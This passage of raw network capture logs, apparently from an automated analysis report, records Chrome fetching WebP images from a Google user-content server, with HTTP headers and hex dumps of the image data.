                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 9204
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 5846
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC857INData Raw: 52 49 46 46 ec 23 00 00 57 45 42 50 56 50 38 20 e0 23 00 00 30 7e 00 9d 01 2a a6 00 28 01 3e 51 20 8d 45 23 a1 a1 15 e9 46 44 38 05 04 b1 01 d8 0f 36 9a bf e7 3f 23 bb de bd 1f 79 fc 8f fc a7 f9 86 b1 bf 76 fe d3 fa 4f fb 2f 24 95 95 e5 99 cb ff eb bf c2 fe 57 7c cf fe df ff 4b fc 77 f7 cf 83 df 9f ff f2 7b 81 7e 9f ff bf ff 09 fb 61 da 97 cc 4f f5 2f f1 df f5 ff c1 7b b9 ff bf fd 80 f7 45 fd ab d4 03 fa 1f f8 ff 58 ef f9 1f ff fd c9 bf bb 7f b4 ff ff ee 1f fc df fc 17 a6 a7 ed f7 c1 b7 f6 ef f8 7f b8 9f 02 7f af 9f f9 3f 74 bf ff fc 80 7f f1 f5 00 ff d1 ea 01 e9 af d8 4f ef 7d ba 7f 80 fc 9c eb bf f6 0f b5 7c c1 e2 65 f2 af b9 7f b0 f5 b5 fc 87 fc ef 0d fe 1e ff 9f ea 05 f9 67 f3 0f f2 9e 24 fb 76 34 bf dc 6f 50 5f 6d be 99 fe e7 fc 27 e4 7f a5 67 fb 7e
                                                                                                                                                                                                                                  Data Ascii: RIFF#WEBPVP8 #0~*(>Q E#FD86?#yvO/$W|Kw{~aO/{EX?tO}|eg$v4oP_m'g~
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 05 d6 05 48 3a 23 ca fd 96 13 02 6c be 4e 6c ef c5 51 05 92 d9 34 44 52 6f 93 ed 8a f7 e8 8f e7 02 50 9b c3 35 b1 94 ed 24 d4 98 89 24 7a c9 99 ad cb b5 84 00 89 19 d9 c7 45 07 e4 76 73 8f 67 5b 71 f6 55 a7 8d 94 c9 72 08 76 3a de 90 28 e6 3e c9 d6 b8 64 47 78 b3 8d f9 ae 89 fa f7 71 e2 56 5c e0 88 0f f3 ee 45 82 6d 1b c7 8f e7 de 09 4a 84 31 df 22 2e d7 7f af b9 fd cd 3c ce b0 93 79 dd c6 15 a6 75 88 0a 1b de 66 33 aa 67 04 94 b5 c8 40 8c 81 52 73 04 6a 0c 1f ab c4 94 b3 2b 3f 55 03 67 b9 42 20 f3 a8 6f 94 5e 25 b4 93 e6 56 75 b0 9e e0 00 fe f6 55 da 20 2c fd 31 aa e7 f3 2a a1 ac f3 ba 88 73 c3 c0 00 04 f0 b4 18 fc 4c 71 73 93 5e d4 f3 31 dc 09 ba 62 89 b3 e8 b2 f2 62 92 e9 04 cb f3 5e ed 8e dd 3e b5 65 97 47 28 a7 9b 0e 0c 28 79 c5 4f 21 9a 65 b3 e1 c7
                                                                                                                                                                                                                                  Data Ascii: H:#lNlQ4DRoP5$$zEvsg[qUrv:(>dGxqV\EmJ1".<yuf3g@Rsj+?UgB o^%VuU ,1*sLqs^1bb^>eG((yO!e
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 2d 6f 6b bb 31 2e d4 0a ef 9d 31 ae 79 6a 6f 6c 0c 7b c2 68 39 7e ec 8e 23 d4 0a cf 6c e1 fa 56 f1 da 12 5e d5 b5 e3 28 b3 00 0f 18 4f ce 0d 7b 5c 46 bc 50 e8 9e 00 49 17 4d fd e5 88 f4 8b f5 4c 33 24 cf dc 3b 4a 5c 32 99 a8 ac c7 ea fd 72 02 11 83 73 b8 f6 3f 19 7b 78 97 65 56 4a b8 ec 81 0b 0f d8 76 c0 e7 43 1f c8 49 68 91 57 e5 86 ae c5 a3 51 b7 03 b4 8d 59 de fe a1 a9 a0 5b 54 31 4d 6a f7 c1 d2 1d 3c a3 62 ee f0 d9 24 f9 43 89 5e 55 fc 9d e3 12 42 1c ea 0d be 34 b5 b2 93 86 0a 22 09 21 d0 4c 94 c7 f8 b5 ac 27 83 7a 42 f0 18 5c 71 33 42 f3 c6 36 57 8f f0 1b c9 ff 41 6c 52 1f 19 38 27 16 25 60 08 3f ae be f6 0a 8f d3 bd 1a d2 87 2f 29 94 64 92 52 d9 cc 81 83 33 1c bf 23 ff 4c 03 f5 93 07 08 e6 9e 4d f6 0c bb 0f 62 c8 cb 02 33 83 4b 0b cd a3 80 1d 79 1e
                                                                                                                                                                                                                                  Data Ascii: -ok1.1yjol{h9~#lV^(O{\FPIML3$;J\2rs?{xeVJvCIhWQY[T1Mj<b$C^UB4"!L'zB\q3B6WAlR8'%`?/)dR3#LMb3Ky
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: f0 53 f8 80 83 b7 29 d1 65 15 98 b2 25 0a 66 d0 3f 88 16 c3 b9 52 1c bc 53 bb cf ef d9 1c be 01 3f 2f f3 8b 53 8d f4 39 04 51 39 17 e0 13 fb d9 c9 74 de 61 88 d0 f6 3c a1 e9 71 56 26 a7 e3 48 e1 2d dc d3 56 2e eb 3f c3 8e 7a 5e 4e f6 4c 10 81 ce 9c ad 8d a3 3c cb ff db a5 2b 5b 5b 65 98 b2 49 97 07 2c 64 f7 96 3e fa 52 90 3e 98 92 fe 62 46 50 23 fe 07 d5 fd 56 29 e9 6c 0b b8 82 ad 79 6c 92 84 7a 26 82 6b 0a 3d 8d b7 50 8c 78 d8 cf 63 e8 6b 32 90 05 86 76 2f ed 01 a3 a9 ec 8e ac 19 a7 6b 32 90 43 1d 42 78 89 0f 53 03 96 7a cc c9 2e 2a 78 47 9e 81 af 4f 25 6f 4a 91 cf 8c 93 a0 51 23 d7 47 22 25 b1 7a 1f 07 be 80 6d d8 f0 d9 76 ee 6c ab f5 2b 9a 45 63 9a 8e b8 da d8 60 88 ec f0 96 a5 70 9a ea a0 f5 e1 e2 ce 4e 53 ea 34 09 a9 0f 4f 54 47 af 69 d2 0e 67 01 37
                                                                                                                                                                                                                                  Data Ascii: S)e%f?RS?/S9Q9ta<qV&H-V.?z^NL<+[[eI,d>R>bFP#V)lylz&k=Pxck2v/k2CBxSz.*xGO%oJQ#G"%zmvl+Ec`pNS4OTGig7
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 76 3f 72 1d 92 a1 aa 5b cb 6d 1a f5 04 63 79 d9 9d c9 fb 8f e4 c5 9f 12 66 c3 b8 0a 6d 2a 4b c3 b4 de d3 12 0b 19 1b 76 1e 4c 64 aa 02 67 3a bd 49 25 8f 80 1c 78 1a 4c 7f e4 e8 be 96 96 14 af 56 d4 da e0 00 8e e7 02 3a 3f 59 7f 78 35 96 21 1f 3b 75 c9 8e b7 78 c9 92 e7 f1 1e ff 38 ca f2 33 f2 0b 9a 12 64 19 db ff 1b 0e 71 a5 5c e3 2e 87 e3 d0 ee 88 5c 08 85 1b 5f 09 ff 4f e4 1b 66 ee 74 3b fb ee b5 a1 f2 26 88 ac c0 c1 65 34 e4 8a fe b3 99 6c ea 31 38 25 ce 7e 97 89 4c b6 cd ce 67 bb 98 fe 0e c4 db 5f fe 93 a1 f1 d3 86 38 dc 3b 00 1d e6 cb 3a 0f 60 ab 57 58 da ee d9 30 dd c8 b7 02 60 b7 bb ac 4a 64 98 e8 d8 5c 6e 24 64 00 51 5b 26 c7 9c c3 9e aa 48 65 29 86 41 59 8f 41 f2 d0 a2 c2 e0 fd c4 ca 3f 78 61 26 bb a6 aa a5 a2 70 e3 da eb 57 4b 42 d1 32 0d 76 4f
                                                                                                                                                                                                                                  Data Ascii: v?r[mcyfm*KvLdg:I%xLV:?Yx5!;ux83dq\.\_Oft;&e4l18%~Lg_8;:`WX0`Jd\n$dQ[&He)AYA?xa&pWKB2vO
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: bf ec de 70 20 cb 93 14 1f f0 90 5e 50 59 7b 96 cd 34 9d f7 d7 e7 e5 37 33 6a 44 44 27 5b 24 d4 66 9e 99 85 b3 cb 27 89 07 c2 3c d8 15 a9 61 ea 96 5a c3 01 ba 6a 7b 61 3a 93 19 e3 e5 f3 fa 2d 00 c6 a2 b2 9a 30 0d 76 36 10 0e 3e 9d 16 82 bd 93 8c 66 23 95 23 55 46 94 fd 97 5c 43 07 ea a8 02 9a 06 24 96 d3 60 43 a8 35 66 8f 39 00 76 b0 a6 a4 22 3c d7 17 75 8d 4e 52 34 1d ed 50 1d 4d c0 ca 19 62 84 e5 6d 68 f9 65 5b 2f 57 76 fc 15 e6 7c db f8 ca b4 f8 3a 3a 99 62 98 84 5e a8 26 fd 03 1a c4 b5 33 cf cc 21 65 e9 2b 67 ab bc bd 31 6f bc d4 41 a6 cd b3 28 fa 08 3e 95 dc ca 83 49 fa 26 01 89 f9 41 70 c5 8f c5 34 2b 0d d7 5f 4c e9 5e 00 4c e7 53 e7 be 1a 26 62 3b 70 cb b1 5a 2d 79 06 35 f3 41 2a 2d 72 1d 85 88 b5 b5 2b bd e8 0a d8 72 40 0f ab ba 29 77 ba 16 38 f6
                                                                                                                                                                                                                                  Data Ascii: p ^PY{473jDD'[$f'<aZj{a:-0v6>f##UF\C$`C5f9v"<uNR4PMbmhe[/Wv|::b^&3!e+g1oA(>I&Ap4+_L^LS&b;pZ-y5A*-r+r@)w8
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 39 98 d1 e2 e1 23 df a5 e5 24 b2 81 f6 0a 40 89 27 6b 8f 75 53 a0 bb 1d cd fa ba 2a 56 3b 32 8d 80 cd 54 2d 41 b3 7b e9 b6 c4 60 7e ec 20 39 30 c3 63 34 43 17 7a 9f bf 0c 46 1b fc f2 82 c2 7a ee 7e 29 b5 50 81 96 d6 3c 2d 76 28 dd e6 74 9b e2 84 00 b3 47 a2 f7 23 9e 29 b3 0f c0 bc 8f bb bf a2 c4 8c 74 ee e8 66 04 e7 e2 c6 86 27 ec 06 38 44 f4 5c fb 88 35 1b 58 5e 7b a1 dd 7d 81 5d 19 88 9f b5 c7 e1 31 4f 17 48 89 92 83 78 79 3d 29 8e be fa 96 c6 39 4a fb 30 0b 7d 62 d8 33 75 16 14 89 36 2d 7b 61 7d b1 22 15 88 9c 1c 80 0d 45 de 58 12 9a 32 d8 47 3b ff fb 79 98 0f 86 15 e5 c2 3a bf 6a e1 12 40 69 f4 42 2e d9 57 b6 63 36 45 39 cb 63 c9 3d ee c9 9e 83 3e 54 ab 91 a2 dc 80 0d fd 92 63 41 72 4b 01 8d fa 0b c4 59 60 de 6a 00 53 43 8e f7 7e 26 9f ef 0b 7b 77 15
                                                                                                                                                                                                                                  Data Ascii: 9#$@'kuS*V;2T-A{`~ 90c4CzFz~)P<-v(tG#)tf'8D\5X^{}]1OHxy=)9J0}b3u6-{a}"EX2G;y:j@iB.Wc6E9c=>TcArKY`jSC~&{w
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC7INData Raw: d2 5c 04 ed 30 00 00
                                                                                                                                                                                                                                  Data Ascii: \0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  132192.168.2.649990142.250.185.2464431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC509OUTGET /63RAiBrl7WNn4cjdnuJq66QMzv7Br8RFftmeCwSV_z6z_s3Z8HdIoYERwCEf01m3aQ=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 9316
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 5846
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC857INData Raw: 52 49 46 46 5c 24 00 00 57 45 42 50 56 50 38 20 50 24 00 00 d0 7e 00 9d 01 2a a6 00 28 01 3e 51 22 8e 45 23 a2 21 14 ca 56 34 38 05 04 b2 37 7e 3e 3d 80 0c ac 33 5f e6 7f 92 1d f2 1b 9b bf fe 39 7e ea 7f 99 f9 a4 aa ff 6a fe 89 fa 3b f2 77 e5 27 77 91 9b ec 07 f5 1f 9b 3f e3 fe 5f 7f 6b ff 65 fd 7b dc b7 e6 df f7 bf cc ff 7f fe 81 7f 48 ff d5 7f 60 ff 1b d8 9b cc 07 f4 0f ef 5f f9 3f e1 7b b1 ff a9 ff ad fe 9f dc df f6 7f 50 0f e9 7f e0 7f f5 7b 57 ff b0 f6 1d fd bd f6 00 fe 89 fe 93 ff af b3 af fc 3f db 9f 83 0f eb bf ec bf 70 3e 04 ff 64 7f f7 7b 00 7f e6 f5 00 e9 f7 eb 97 f9 0e d7 7f c1 7f 6a f2 0f c5 8f a9 bd be fe f7 ed 11 99 be c8 75 35 f9 6f da 1f d2 7f 8a fd cb f6 23 fd 6f 84 ff 23 bf bd f5 08 fc 93 f9 77 f8 df ec de 45 ff e1 77 1f 6d 3f eb 3f d2
                                                                                                                                                                                                                                  Data Ascii: RIFF\$WEBPVP8 P$~*(>Q"E#!V487~>=3_9~j;w'w?_ke{H`_?{P{W?p>d{ju5o#o#wEwm??
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 8c cd 70 46 6e 59 27 35 72 83 2a 4c 67 29 7b a3 0e cd 4c df f3 c3 67 1d e0 07 a5 d1 b0 24 b0 5f 17 60 04 0f 98 49 b7 15 be 8b a4 30 90 90 cb ae 49 2f ac 04 ba d3 20 15 ce 15 51 ef 0c a6 a3 8b 84 40 74 1f 4d 2d 73 10 d2 d0 47 40 59 41 49 9f dc 4c 25 66 50 f2 26 29 20 b7 01 6d 85 67 3c dc 21 5e d8 41 32 35 a3 5a 90 8d df 10 42 1f a0 7b 06 2c 94 66 f2 eb 1f db ec 6a 89 71 e9 93 71 f1 fe ac 2c e1 ba 2c 6c 5d 20 1e bc 27 6b e6 6c 84 fe 58 5a b7 ce 5d 2b 43 bc ef c6 dc a9 f4 27 dd f1 96 f6 31 f7 4b ab f6 71 4a a4 65 d4 67 63 6b cc 03 98 66 de 58 2b de 44 c0 00 fd d1 77 f1 cd 82 3a 5d 7f 22 3b 2b 89 b4 d9 b9 9f 00 00 00 00 18 38 27 54 b6 6d a4 b0 87 50 c7 52 1b 37 8f 3c 0e f4 36 8d 75 52 b1 f3 67 e0 73 bc 7b d2 0c 1a c2 c9 0e 72 29 fe 98 43 5d 18 a1 8d 8c 0e 7b
                                                                                                                                                                                                                                  Data Ascii: pFnY'5r*Lg){Lg$_`I0I/ Q@tM-sG@YAIL%fP&) mg<!^A25ZB{,fjqq,,l] 'klXZ]+C'1KqJegckfX+Dw:]";+8'TmPR7<6uRgs{r)C]{
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 2b b0 64 10 4f 61 71 22 f0 f0 ce b8 d0 79 de c6 22 89 54 1c 8a aa eb f0 58 38 80 75 2e a4 26 a7 b3 d1 f8 60 68 e3 92 8a 34 60 61 04 ce e4 fb 04 7e 44 d0 f0 40 d8 cc 03 1c e0 f6 7f ba 4e 94 75 52 fe 55 6c 4e a5 08 34 60 0c c0 fc f8 ce 81 2c 3f 73 58 d0 49 07 c4 37 f5 c0 6f 37 54 47 de 7b af e6 3a a1 69 89 c1 7d 51 a7 42 58 6f 88 7d a7 d1 53 f5 e9 d9 31 b3 b1 a3 7e 37 90 b6 f8 2c 98 d3 65 e1 3a f8 a3 fa bc d4 94 a0 8c be 64 ad 9a e0 8e 92 03 a0 01 b4 65 0a 75 98 d9 60 20 3c 45 f1 18 48 2e 55 08 67 fd 6e 45 16 57 d7 49 a7 bb 30 60 8f 42 c3 cb eb 62 a9 05 02 da 3a 3a 57 fc d1 c7 55 30 8a 1c e3 df 10 27 c9 79 ee b7 bb 7e 4f e4 ff 3f 4c dc 25 8c b7 f6 38 4b 7c 77 d7 13 26 6a f1 4f 06 d6 08 00 ec ff 80 e4 5b 9d a5 d7 9e 07 a0 18 00 fd 00 ae e9 58 9c 8b e7 5b eb
                                                                                                                                                                                                                                  Data Ascii: +dOaq"y"TX8u.&`h4`a~D@NuRUlN4`,?sXI7o7TG{:i}QBXo}S1~7,e:deu` <EH.UgnEWI0`Bb::WU0'y~O?L%8K|w&jO[X[
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 1e 54 f5 1e 88 74 1e 98 01 69 96 f8 0d a9 ee 1f 84 05 5f c6 64 36 6a 74 61 f6 d5 c8 89 89 d5 ec 9c ab 7f 8a d0 91 af 0e bf ea 14 6f 56 c6 11 55 21 04 05 fc 4a 49 7e 87 d4 75 49 8e 50 22 9e 11 52 5b 4b 51 bd 72 72 ce c8 1b ed ec 42 51 e2 dc 99 d8 79 9e 4c 93 3f e1 f8 73 e3 cb 06 87 91 f6 c0 da 58 83 d1 e4 46 40 25 04 ff 9e 75 5f d6 f2 de 9d d1 2a ca fe 6a f6 d2 84 95 ba 83 f7 c0 1f 90 b2 95 3d 4b 91 a5 db c9 3f 6d 60 25 cc 42 36 08 6b 89 6b c5 af d8 bc c5 03 83 0a 3b cc 93 8b 27 b3 44 a3 f7 0b b0 d6 d9 57 7a 41 9e 5b 53 24 82 ab 6c 49 fe 66 a6 74 a7 cc 62 33 bc ad f7 d4 fa d0 07 21 dc 6a b3 1d 4e 94 34 0a 32 2c 17 59 4a bb f5 e8 ec c7 7e bd 0a 4f 95 02 91 a2 54 f5 ce 17 44 6b 73 88 45 df 44 1f f6 47 6a 0d 45 63 fb c7 fc 59 69 72 27 58 5c 50 a6 8d a1 92 9b
                                                                                                                                                                                                                                  Data Ascii: Tti_d6jtaoVU!JI~uIP"R[KQrrBQyL?sXF@%u_*j=K?m`%B6kk;'DWzA[S$lIftb3!jN42,YJ~OTDksEDGjEcYir'X\P
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 53 18 2f 49 6f 18 37 0a d5 9d fb 4c c5 d4 23 17 59 5d 0f 2b a9 10 01 83 a5 97 7e a9 f0 f1 d3 d7 ac df a3 93 22 20 a7 6c bf 5c 92 a6 1e b9 46 1d a0 bc 41 e7 c8 88 b7 26 05 44 ef f7 b1 cf ff 84 dc ad 52 7a d9 80 c2 86 5f 12 6e 5d 4d 59 c1 88 e6 05 6c 78 1b 75 08 f0 4f 67 8e ad d4 be 13 8e 16 b7 49 da 7c bf a3 e7 fa 4f 16 19 44 9b de c1 42 83 01 17 fa 89 72 eb 5b 29 32 ca ec 0a 19 e8 31 75 f8 20 75 8b e0 10 61 7a 02 9d 6d cb ca 77 3e b8 4a 3a 92 3b 73 ac f6 35 34 37 01 96 54 d9 a4 f8 91 21 f1 98 7f 53 27 a1 6e 17 23 ab 2d 15 f1 da 26 27 8c 4e 97 20 01 fe 9b d7 b0 ad d5 a0 2d 55 a5 9b 35 79 7a 54 8e b9 b1 90 cd 3c 40 57 65 f3 99 b3 cf d8 23 12 8d cf cf e6 93 3d db 90 f2 4e 93 18 70 28 1e 68 a4 ba 43 1d e9 bb ad 63 61 64 94 7d c0 9f b1 32 92 c6 42 43 fb 54 97
                                                                                                                                                                                                                                  Data Ascii: S/Io7L#Y]+~" l\FA&DRz_n]MYlxuOgI|ODBr[)21u uazmw>J:;s547T!S'n#-&'N -U5yzT<@We#=Np(hCcad}2BCT
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 47 ab 3c 66 12 b2 ef 65 12 30 2b 47 3c f3 ea 4b 6d 0a f6 50 14 c8 80 a2 aa 10 e3 d2 52 3e 91 e1 6c 75 41 af 48 d0 6b 94 c2 28 fd 68 4b 59 30 76 30 51 5b d3 5b b2 af 1b da 6c 41 46 16 69 86 6e cc ef fd d8 a7 de 02 bf 6d 94 86 47 d9 0a f4 5d 69 fb e3 77 01 d9 65 9c a9 8c 82 8a bc 42 25 6a b3 1f ab c5 58 b5 56 ac b1 ae 0c 26 c4 45 0c 4e 34 f1 85 74 a2 23 cd 5f a0 1c 3d 4a 64 73 8b 81 07 09 96 ce 5e 9a 4d 4f aa a2 2e 44 88 ec d6 bf 1f 81 c1 e0 9a 1d 6e 42 1f 58 66 7c 69 39 57 16 e4 b1 29 18 89 2b 86 6a 96 df 91 af 1c 23 49 63 21 cf 38 6d 84 b7 34 91 7e 02 06 18 c3 d6 1b bd 39 90 df 5b 1a 56 59 cf 15 17 15 c0 d1 9d 7c d8 61 35 fe a1 3d f8 64 ae 98 b7 73 65 34 65 fe 7f e3 17 e4 41 7b 7c bf 7a 53 d1 41 7a 24 3c 46 1e 84 70 e2 15 d3 83 d8 85 4c c0 f1 7e a4 72 58
                                                                                                                                                                                                                                  Data Ascii: G<fe0+G<KmPR>luAHk(hKY0v0Q[[lAFinmG]iweB%jXV&EN4t#_=Jds^MO.DnBXf|i9W)+j#Ic!8m4~9[VY|a5=dse4eA{|zSAz$<FpL~rX
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: af 7d 6a 93 84 b9 2d b2 ce 52 9e 72 3c bf 33 93 4a 82 0c c5 8f 80 71 34 16 2f a1 70 b5 e0 35 52 43 e2 13 7d 31 aa 7e 1c a8 90 01 a6 dc 3d 35 e1 fe 03 eb d7 4a 67 68 19 cd 62 f4 5d a2 42 f6 4e c6 e7 de 2e 53 04 6a e8 4f 5d 6c 6c 8b a4 de ef 5e 0b b5 1b 34 87 c9 3c ea 51 96 30 e8 80 b3 ac f1 83 b8 a7 89 7d 7d cd c7 85 e2 68 20 c3 2b fd 2c 00 42 7b bb 9d 12 6f 1d 67 9b 0a 2c 4c 78 af 47 03 db 7a af fd c3 5b 8b 59 df c6 b2 4c 93 43 bd 8c de d0 df 82 5f 3b 34 04 71 7a 47 55 0f f8 0a 1f 8d 4d 7a 62 28 9a 28 e9 5b 75 e5 6f 28 1d 4e 2f 80 9e fb 4e d8 71 47 e4 9b ae 15 1b cd a7 d4 d0 08 ff ce 86 24 70 5f 2f 27 4a ab 2d 1e 31 41 9b 86 ea cd e2 ed c0 73 15 54 df a0 49 3d 9b a8 5f a5 14 8b 3d 90 af 4f f1 8f 36 54 2a f8 f6 7b a3 eb fe d5 03 89 79 5d f0 a0 b0 e6 d7 b8
                                                                                                                                                                                                                                  Data Ascii: }j-Rr<3Jq4/p5RC}1~=5Jghb]BN.SjO]ll^4<Q0}}h +,B{og,LxGz[YLC_;4qzGUMzb(([uo(N/NqG$p_/'J-1AsTI=_=O6T*{y]
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC119INData Raw: 82 73 02 1b 12 82 f5 28 f4 50 99 9b 7c 66 ca 85 83 97 78 1a 76 a0 61 9b 4a 71 80 9c 3f 24 f5 24 bd 49 dd c7 cd 5c 37 e3 82 67 d1 b3 12 e6 c9 c7 15 18 7c af 38 e5 91 f7 a2 a5 0a 6e 91 0f b0 3d 52 47 b7 d1 e3 56 5f 80 fe e9 60 24 8b 42 ad 0b 3d 71 04 2f 24 72 d5 83 4f 5b 09 c2 8b 10 2e 97 76 4c 2c d6 c2 55 e0 f6 32 2e 66 8b c9 f0 26 8e ca fd c3 56 00 00 00
                                                                                                                                                                                                                                  Data Ascii: s(P|fxvaJq?$$I\7g|8n=RGV_`$B=q/$rO[.vL,U2.f&V


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  133192.168.2.649993142.250.185.2464431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC509OUTGET /LCVRRBHTcHs2NFs14MsnVMA51vENNhT-VUex4HRMXuBZmVJ1b6lJOTJnwC5LcSPurg=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 11894
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 5846
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
